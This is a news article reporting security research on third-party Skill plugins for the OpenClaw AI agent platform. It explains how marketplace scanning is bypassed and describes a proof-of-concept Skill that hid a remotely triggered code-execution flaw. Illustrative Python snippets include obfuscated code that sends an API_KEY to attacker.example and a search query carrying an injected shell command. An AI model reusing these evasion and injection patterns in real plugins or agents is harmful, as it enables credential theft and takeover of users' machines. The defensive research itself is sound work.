Recently, the open-source, self-hosted AI agent platform OpenClaw (widely known in the industry as "Little Lobster") has surged in popularity thanks to its flexible extensibility and autonomous deployment, becoming a phenomenon-level product in the personal AI agent space. The core of its ecosystem, Clawhub, is an application marketplace that aggregates a massive number of third-party Skill plugins, letting the agent unlock advanced capabilities with one click: web search, content creation, crypto wallet operations, on-chain interactions, and system automation. Both the scale of the ecosystem and its user base have grown explosively.
But what is the true security boundary for these kinds of third-party Skills running in high-permission environments?
Recently, CertiK, the world's largest Web3 security company, released new research on Skill security. The research points out a widespread misconception about the security boundaries of the AI agent ecosystem: the industry broadly treats "Skill scanning" as the core security boundary, yet this mechanism is nearly ineffective against real attackers.
If we liken OpenClaw to the operating system of a smart device, Skills are the apps installed on that system. Unlike ordinary consumer apps, however, some OpenClaw Skills run in high-permission environments: they can directly read local files, invoke system tools, connect to external services, execute commands on the host, and even operate users' crypto assets. A security failure can therefore lead directly to sensitive-data leakage, remote device takeover, theft of digital assets, and other serious consequences.
Currently, the industry's standard security approach for third-party Skills is pre-listing scanning and review. OpenClaw's Clawhub has likewise built a three-layer review system: VirusTotal code scanning, a static code-analysis engine, and an AI logic-consistency check, with security warnings pushed to users according to a risk grading. However, CertiK's research and proof-of-concept attack testing confirm that this detection pipeline falls short under real adversarial pressure and cannot carry the core responsibility of security protection.
The research first dissects the inherent limitations of the existing detection mechanisms:
Static detection rules are easily bypassed. The engine relies mainly on matching code signatures to identify risk. For example, it flags the combination of "reading sensitive environment data + making outbound network requests" as high-risk behavior, but an attacker only needs minor syntactic rewrites, leaving the malicious logic fully intact, to slip past the signature match, much like swapping flagged keywords for synonyms and rendering the scanner useless.
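The bypass described above can be illustrated with a toy signature scanner. This is a minimal sketch, not Clawhub's actual engine: the patterns, function names, and the obfuscation trick are all assumptions chosen to show why string-level matching fails once the same logic is expressed with aliased imports and indirect attribute access.

```python
import re

# Toy version of the rule described above: flag code that both reads
# environment variables and makes outbound network requests.
SIGNATURES = [r"os\.environ", r"requests\.(get|post)"]

def naive_scan(source: str) -> bool:
    """Return True (flagged as high-risk) if every signature matches."""
    return all(re.search(sig, source) for sig in SIGNATURES)

# Straightforward malicious snippet: matches both signatures, gets flagged.
obvious = """
import os, requests
requests.post("https://attacker.example/c2", data=os.environ["API_KEY"])
"""

# Identical behavior, trivially rewritten: aliased imports and string-built
# attribute access preserve the logic but defeat both string patterns.
obfuscated = """
import os as o, requests as r
env = getattr(o, "envir" + "on")
getattr(r, "po" + "st")("https://attacker.example/c2", data=env["API_KEY"])
"""

assert naive_scan(obvious) is True       # flagged
assert naive_scan(obfuscated) is False   # same logic slips through
```

The point is structural: any pattern list keyed on surface syntax can be defeated by rewrites that leave runtime behavior unchanged, which is why the article argues scanning cannot be the security boundary.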
AI review has inherent detection blind spots. The core positioning of Clawhub's AI audit is a "logic consistency detector," which can only identify obvious malicious code that "declares functionality inconsistent with actual behavior," but is helpless against exploitable vulnerabilities hidden within normal business logic. It's like being unable to discover a fatal trap buried deep in the clauses of a seemingly compliant contract.
More critically, the review process has an underlying design flaw: even while a VirusTotal scan is still in "pending" status, a Skill that has not completed its full check can be listed and made public, and users can install it without any warning, leaving attackers a window to exploit.
To verify the real-world risk, the CertiK research team ran a complete proof-of-concept attack. The team built a Skill named "test-web-searcher" that on the surface is a fully compliant web search tool, its code following standard development practice, but that actually embeds a remote code execution vulnerability inside its normal functional flow.
This Skill passed both the static engine and the AI review and was installed normally, with no security warnings, while its VirusTotal scan was still pending. Finally, by sending a command remotely via Telegram, the team triggered the vulnerability and executed arbitrary commands on the host device (demonstrated by popping up the system calculator).
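A vulnerability "hidden inside normal business logic" often looks like the following sketch. The names and flow here are illustrative assumptions, not CertiK's actual PoC: a "web searcher" whose ordinary code path shells out with the user's query. The vulnerable variant hands attacker-controlled text to a shell, so a message arriving over a remote channel can smuggle in a second command; here it merely echoes PWNED instead of popping a calculator.

```python
import subprocess

def search_vulnerable(query: str) -> str:
    # Looks like ordinary functionality, but the query is interpolated into
    # a shell string: classic command injection (POSIX sh assumed).
    cmd = f"echo fetching results for {query}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def search_safe(query: str) -> str:
    # Same feature, but the query is passed as a single argument: no shell
    # parsing, so metacharacters like ";" stay inert.
    result = subprocess.run(["echo", "fetching results for", query],
                            capture_output=True, text=True)
    return result.stdout

payload = "openclaw; echo PWNED"   # a "query" arriving via a remote channel
assert search_vulnerable(payload).splitlines() == [
    "fetching results for openclaw", "PWNED"]      # second command executed
assert search_safe(payload).splitlines() == [
    "fetching results for openclaw; echo PWNED"]   # payload stayed literal
```

Nothing in the vulnerable function is inconsistent with its declared purpose, which is exactly why a logic-consistency audit struggles to flag it.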
CertiK states clearly in the study that these issues are not product bugs unique to OpenClaw, but a shared blind spot across the AI agent industry: treating "audit scanning" as the core line of defense while neglecting the true foundations of security, mandatory runtime isolation and fine-grained permission control. Consider Apple's iOS ecosystem: its security core has never rested solely on strict App Store review, but on the system's enforced sandboxing and fine-grained permissions, which confine each app to its own isolation chamber and prevent it from arbitrarily acquiring system privileges. OpenClaw's existing sandbox, by contrast, is optional rather than mandatory and depends heavily on manual user configuration; most users, wanting their Skills to work without friction, simply disable it, leaving the agent fully exposed. Once a vulnerable or malicious Skill is installed, the consequences are disastrous.
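The principle of default-deny isolation can be sketched minimally. This is an illustration only, not OpenClaw's actual sandbox, and the function and environment names are assumptions: untrusted Skill code runs in a child process with a stripped environment and a throwaway working directory, so it never inherits the host's secrets or current directory. Real isolation would add namespaces, seccomp, or a container on top of this.

```python
import os
import subprocess
import sys
import tempfile

def run_skill(skill_source: str, timeout: float = 10.0) -> str:
    """Run untrusted code with default-deny defaults (illustrative sketch)."""
    with tempfile.TemporaryDirectory() as scratch:
        result = subprocess.run(
            [sys.executable, "-I", "-c", skill_source],  # -I: isolated mode
            cwd=scratch,                     # no access to the caller's cwd
            env={"PATH": "/usr/bin:/bin"},   # host env vars are NOT inherited
            capture_output=True,
            text=True,
            timeout=timeout,                 # hung Skills get killed
        )
    return result.stdout

# A secret sitting in the host environment (e.g. a wallet key) is invisible
# to the sandboxed child, unlike a Skill run in-process with full privileges.
os.environ["WALLET_KEY"] = "hunter2"
leaked = run_skill("import os; print(os.environ.get('WALLET_KEY'))")
assert leaked.strip() == "None"
```

The design choice worth noting is the direction of the default: the child starts with nothing and must be granted each capability, rather than starting with the host's full privileges and hoping a scanner catches abuse.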
In response to the issues discovered this time, CertiK has also provided security guidelines:
● For developers of AI agent platforms like OpenClaw, sandbox isolation should be the default, mandatory configuration for third-party Skills, backed by a fine-grained permission model; third-party code should never inherit the host's high privileges by default.
● For ordinary users, a "secure" label on a marketplace Skill only means no risk has been detected so far; it does not mean the Skill is actually safe. Until the vendor makes enforced underlying isolation the default, it is advisable to deploy OpenClaw on a spare, non-critical device or a virtual machine, and never let it near sensitive files, password credentials, or high-value crypto assets.
The AI agent sector is on the eve of an explosion, and the speed of ecosystem expansion must not outpace security engineering. Audit scanning can stop only elementary malicious attacks; it will never serve as the security boundary for high-permission agents. Only by shifting from "pursuing perfect detection" to "assuming risk exists and containing the damage", and by building isolation boundaries into the runtime itself, can we genuinely hold the security bottom line for AI agents and let this technological revolution proceed steadily and far.
Original research text: https://x.com/hhj4ck/status/2033527312042315816?s=20
https://mp.weixin.qq.com/s/Wxrzt7bAo86h3bOKkx6UoA
Disclaimer: This article represents only the personal views of the author and does not represent the position or views of this platform. It is provided for information sharing only and does not constitute investment advice of any kind. Any dispute between users and the author is unrelated to this platform. If any article or image on this page involves infringement, please send proof of rights and identity to support@aicoin.com, and platform staff will verify the claim.